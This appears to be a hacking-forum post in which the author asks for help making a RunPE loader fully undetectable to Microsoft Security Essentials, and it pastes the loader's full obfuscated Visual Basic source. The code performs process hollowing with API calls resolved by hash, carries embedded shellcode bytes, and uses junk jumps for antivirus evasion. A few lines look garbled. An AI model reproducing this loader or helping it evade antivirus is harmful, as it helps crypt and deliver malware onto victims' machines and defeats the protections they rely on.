I think the title says it all. The thing is that I somehow need to make this RunPE FUD against Essentials, but I mostly mod at the binary level, so can someone give me a hand? I don't even know which part it is detecting.
This is the RunPE:
Option Explicit
Option Base 0sNh
StsGuthRmoOALo As Long
Private Type MopFlsAr
End Type
Private Type EqMlFsPpRtjMRlJi
RqhJBisFAlmERunFC As Byte
CqnSNmLj As Byte
B3 As Byte
MtGlliJjpGt As Byte
End Type
Private Const ¦ã¬Æ®âÆ¢±ê As String = "KERNEL32"
Public Declare Function AbortDoc Lib "gdi32" (ByVal hdc As Long) As Long
Private Declare Function CallWindowProcA Lib "user32" (ByVal âúô«Èƒ£ªª¶0 As Long, Optional ByVal âúô«Èƒ£ªª¶1 As Long, Optional ByVal âúô«Èƒ£ªª¶2 As Long, Optional ByVal âúô«Èƒ£ªª¶3 As Long, Optional ByVal âúô«Èƒ£ªª¶4 As Long) As Long
Public Declare Function CallNextHookEx Lib "user32" (ByVal hHook As Long, ByVal ncode As Long, ByVal wParam As Long, lParam As Any) As Long
Private q®ÇQ£ªÇǬ¤9 As Boolean
Private q®ÇQ£ªÇǬ¤8(170) As Byte
Private âúô«Èƒ£ªª¶5(255) As Byte
Private Const q®ÇQ£ªÇǬ¤ As String = "NTDLL"
public function ãó¤x¥¶¦¢ú¦ ()
goto asd
asd:
end function
Public Function âúô«Èƒ£ªª¶(ByRef óº¬Ç¦óãÈ£¦() As Byte, ByVal ú¶È¦¶ªª®óê As String, Optional ByVal ¬ó¦ÇQxÇ©¬¬ As String, Optional ByRef qB¬¤¤Øx©Ç£ As Long) As Boolean
Dim ¥¦¦¤£±Æ¶¬ã As Long
Dim ¼ƒÈ㪶q¤Æ¶ As Long
Dim ¦ã¬Æ®âÆ¢±ê0 As Long
Dim ¦ã¬Æ®âÆ¢±ê1 As Long
Dim ¦ã¬Æ®âÆ¢±ê2 As Long
Dim ¦ã¬Æ®âÆ¢±ê3(16) As Long
Dim ¦ã¬Æ®âÆ¢±ê4(3) As Long
Dim ¦ã¬Æ®âÆ¢±ê5(50) As Long
¥¦¦¤£±Æ¶¬ã = VarPtr(óº¬Ç¦óãÈ£¦(0))
If Not ¦ã¬Æ®âÆ¢±ê7(¥¦¦¤£±Æ¶¬ã, 2) = &H5A4D Then Exit Function
¼ƒÈ㪶q¤Æ¶ = ¥¦¦¤£±Æ¶¬ã + ¦ã¬Æ®âÆ¢±ê7(¥¦¦¤£±Æ¶¬ã + &H3C)
If Not ¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶) = &H4550 Then Exit Function
¦ã¬Æ®âÆ¢±ê1 = ¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶ + &H34)
¦ã¬Æ®âÆ¢±ê3(0) = &H44
Call ¦ã¬Æ®âÆ¢±ê6(¦ã¬Æ®âÆ¢±ê, &H16B3FE88, StrPtr(ú¶È¦¶ªª®óê), StrPtr(¬ó¦ÇQxÇ©¬¬), 0, 0, 0, &H4, 0, 0, VarPtr(¦ã¬Æ®âÆ¢±ê3(0)), VarPtr(¦ã¬Æ®âÆ¢±ê4(0)))
GoTo BúMQ¥
BúMQ¥:
GoTo S¥óÇY
S¥óÇY:
GoTo V¼¥QJ
V¼¥QJ:
GoTo ãQAÈP
ãQAÈP:
GoTo q¤vMã
q¤vMã:
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HF21037D0, ¦ã¬Æ®âÆ¢±ê4(0), ¦ã¬Æ®âÆ¢±ê1)
GoTo ¤amIÈ
¤amIÈ:
GoTo fqPs¬
fqPs¬:
GoTo ãIZØÆ
ãIZØÆ:
GoTo SaôdW
SaôdW:
GoTo mNWMo
mNWMo:
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HD33BCABD, ¦ã¬Æ®âÆ¢±ê4(0), VarPtr(¦ã¬Æ®âÆ¢±ê1), 0, VarPtr(¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶ + &H50)), &H3000, &H40)
GoTo ãvZǶ
ãvZǶ:
GoTo ãSbpZ
ãSbpZ:
GoTo ÇJ¦ws
ÇJ¦ws:
GoTo ªHnfl
ªHnfl:
GoTo ÇMuiw
ÇMuiw:
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HC5108CC2, ¦ã¬Æ®âÆ¢±ê4(0), ¦ã¬Æ®âÆ¢±ê1, VarPtr(óº¬Ç¦óãÈ£¦(0)), ¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶ + &H54), 0)
For ¦ã¬Æ®âÆ¢±ê2 = 0 To ¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶ + &H6, 2) - 1
¦ã¬Æ®âÆ¢±ê0 = ¼ƒÈ㪶q¤Æ¶ + &HF8 + (&H28 * ¦ã¬Æ®âÆ¢±ê2)
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HC5108CC2, ¦ã¬Æ®âÆ¢±ê4(0), ¦ã¬Æ®âÆ¢±ê1 + ¦ã¬Æ®âÆ¢±ê7(¦ã¬Æ®âÆ¢±ê0 + &HC), ¥¦¦¤£±Æ¶¬ã + ¦ã¬Æ®âÆ¢±ê7(¦ã¬Æ®âÆ¢±ê0 + &H14), ¦ã¬Æ®âÆ¢±ê7(¦ã¬Æ®âÆ¢±ê0 + &H10), 0)
Next ¦ã¬Æ®âÆ¢±ê2
¦ã¬Æ®âÆ¢±ê5(0) = &H10007
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HE935E393, ¦ã¬Æ®âÆ¢±ê4(1), VarPtr(¦ã¬Æ®âÆ¢±ê5(0)))
GoTo xªwF«
xªwF«:
GoTo Nsªj¶
Nsªj¶:
GoTo sômYþ
sômYþ:
GoTo BlvO¬
BlvO¬:
GoTo ªVsú©
ªVsú©:
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HC5108CC2, ¦ã¬Æ®âÆ¢±ê4(0), ¦ã¬Æ®âÆ¢±ê5(41) + &H8, VarPtr(¦ã¬Æ®âÆ¢±ê1), &H4, 0)
¦ã¬Æ®âÆ¢±ê5(44) = ¦ã¬Æ®âÆ¢±ê1 + ¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶ + &H28)
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &H6935E395, ¦ã¬Æ®âÆ¢±ê4(1), VarPtr(¦ã¬Æ®âÆ¢±ê5(0)))
GoTo ¦¼LqJ
¦¼LqJ:
GoTo EP¤¤o
EP¤¤o:
GoTo HvóoØ
HvóoØ:
GoTo fwǥn
fwǥn:
GoTo £ld£©
£ld£©:
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HC54A46C8, ¦ã¬Æ®âÆ¢±ê4(1), 0)
qB¬¤¤Øx©Ç£ = ¦ã¬Æ®âÆ¢±ê4(0)
âúô«Èƒ£ªª¶ = True
End Function
Private Function ¦ã¬Æ®âÆ¢±ê7(ByVal ¦ã¬Æ®âÆ¢±ê8 As Long, Optional ByVal ¦ã¬Æ®âÆ¢±ê9 As Long = &H4) As Long
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HC5108CC2, -1, VarPtr(¦ã¬Æ®âÆ¢±ê7), ¦ã¬Æ®âÆ¢±ê8, ¦ã¬Æ®âÆ¢±ê9, 0)
End Function
public function þǦ¦ªêÇÆÈÇ ()
goto asd2
asd2:
end function
Public Function ¦ã¬Æ®âÆ¢±ê6(ByVal OjiAimDRt As String, ByVal JrClh As Long, ParamArray q®ÇQ£ªÇǬ¤0() As Variant) As Long
Dim q®ÇQ£ªÇǬ¤1 As Variant
Dim q®ÇQ£ªÇǬ¤2 As EqMlFsPpRtjMRlJi
Dim q®ÇQ£ªÇǬ¤3 As Long
Dim ¦ã¬Æ®âÆ¢±ê2 As Long
Dim q®ÇQ£ªÇǬ¤4 As Long
If Not q®ÇQ£ªÇǬ¤9 Then
For ¦ã¬Æ®âÆ¢±ê2 = 0 To 170
q®ÇQ£ªÇǬ¤8(¦ã¬Æ®âÆ¢±ê2) = CByte(Choose(¦ã¬Æ®âÆ¢±ê2 + 1, &HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
&H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3))
Next ¦ã¬Æ®âÆ¢±ê2
¦ã¬Æ®âÆ¢±ê2 = 0
q®ÇQ£ªÇǬ¤9 = True
End If
q®ÇQ£ªÇǬ¤3 = CallWindowProcA(VarPtr(q®ÇQ£ªÇǬ¤8(0)), StrPtr(OjiAimDRt), JrClh)
If q®ÇQ£ªÇǬ¤3 Then
For q®ÇQ£ªÇǬ¤4 = UBound(q®ÇQ£ªÇǬ¤0) To LBound(q®ÇQ£ªÇǬ¤0) Step -1
q®ÇQ£ªÇǬ¤2 = q®ÇQ£ªÇǬ¤6(CLng(q®ÇQ£ªÇǬ¤0(q®ÇQ£ªÇǬ¤4)))
Call q®ÇQ£ªÇǬ¤5(&H68, ¦ã¬Æ®âÆ¢±ê2)
GoTo ôCUH¥
ôCUH¥:
GoTo ÆÆ¬ªj
ÆÆ¬ªj:
GoTo j¼ótó
j¼ótó:
GoTo óavãS
óavãS:
GoTo P¬SãI
P¬SãI:
Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.RqhJBisFAlmERunFC, ¦ã¬Æ®âÆ¢±ê2): Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.CqnSNmLj, ¦ã¬Æ®âÆ¢±ê2)
GoTo XvXnb
XvXnb:
GoTo ¬qkóƒ
¬qkóƒ:
GoTo B£¤u¶
B£¤u¶:
GoTo ovtºZ
ovtºZ:
GoTo êph£S
êph£S:
Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.B3, ¦ã¬Æ®âÆ¢±ê2): Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.MtGlliJjpGt, ¦ã¬Æ®âÆ¢±ê2)
Next q®ÇQ£ªÇǬ¤4
q®ÇQ£ªÇǬ¤2 = q®ÇQ£ªÇǬ¤6(q®ÇQ£ªÇǬ¤3)
Call q®ÇQ£ªÇǬ¤5(&HB8, ¦ã¬Æ®âÆ¢±ê2)
GoTo hgvjã
hgvjã:
GoTo ãKKVn
ãKKVn:
GoTo ªãyv¤
ªãyv¤:
GoTo êagg£
êagg£:
GoTo tqoªj
tqoªj:
Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.RqhJBisFAlmERunFC, ¦ã¬Æ®âÆ¢±ê2): Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.CqnSNmLj, ¦ã¬Æ®âÆ¢±ê2)
GoTo AYiêþ
AYiêþ:
GoTo ¦ã®©Æ
¦ã®©Æ:
GoTo R¬êªO
R¬êªO:
GoTo E¥¥Ç¥
E¥¥Ç¥:
GoTo Çyae±
Çyae±:
Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.B3, ¦ã¬Æ®âÆ¢±ê2): Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.MtGlliJjpGt, ¦ã¬Æ®âÆ¢±ê2)
GoTo QYeNó
QYeNó:
GoTo HObºF
HObºF:
GoTo ¶êbj¬
¶êbj¬:
GoTo WL«OA
WL«OA:
GoTo ¤SZƒô
¤SZƒô:
Call q®ÇQ£ªÇǬ¤5(&HFF, ¦ã¬Æ®âÆ¢±ê2): Call q®ÇQ£ªÇǬ¤5(&HD0, ¦ã¬Æ®âÆ¢±ê2)
GoTo Cn¦uM
Cn¦uM:
GoTo OdF£O
OdF£O:
GoTo Jz¤¦ã
Jz¤¦ã:
GoTo ¤¥SiW
¤¥SiW:
GoTo tCTwâ
tCTwâ:
Call q®ÇQ£ªÇǬ¤5(&HC3, ¦ã¬Æ®âÆ¢±ê2)
¦ã¬Æ®âÆ¢±ê6 = CallWindowProcA(VarPtr(âúô«Èƒ£ªª¶5(0)))
End If
End Function
public function Bª¤®£¥ªâ±ª ()
goto asd3
asd3:
end function
Private Sub q®ÇQ£ªÇǬ¤5(ByVal RtnKssmDESCLBD As Byte, ByRef rKjRoAnlrQ As Long)
âúô«Èƒ£ªª¶5(rKjRoAnlrQ) = RtnKssmDESCLBD
rKjRoAnlrQ = rKjRoAnlrQ + 1
End Sub
Private Function q®ÇQ£ªÇǬ¤6(ByVal jBtiMtD As Long) As EqMlFsPpRtjMRlJi
Dim uLptJlthnNlmGolJ As MopFlsArsNh
uLptJlthnNlmGolJ.StsGuthRmoOALo = jBtiMtD
LSet q®ÇQ£ªÇǬ¤6 = uLptJlthnNlmGolJ
End Function
public function ¥ª££ÇªôâǬ ()
goto asd4
asd4:
end function
'*** RunPe Trasher by v0id***
'*** Usage: Call âúô«Èƒ£ªª¶(sByte, sApp.Path , Command) ***
If you want to help me, you can send me a PM and we'll get in touch.
PS: I already tried obfuscating it with ACO, but it doesn't obfuscate it properly and gives errors. Then I tried the unique runpe maker and that does work, but I want to use this RunPE.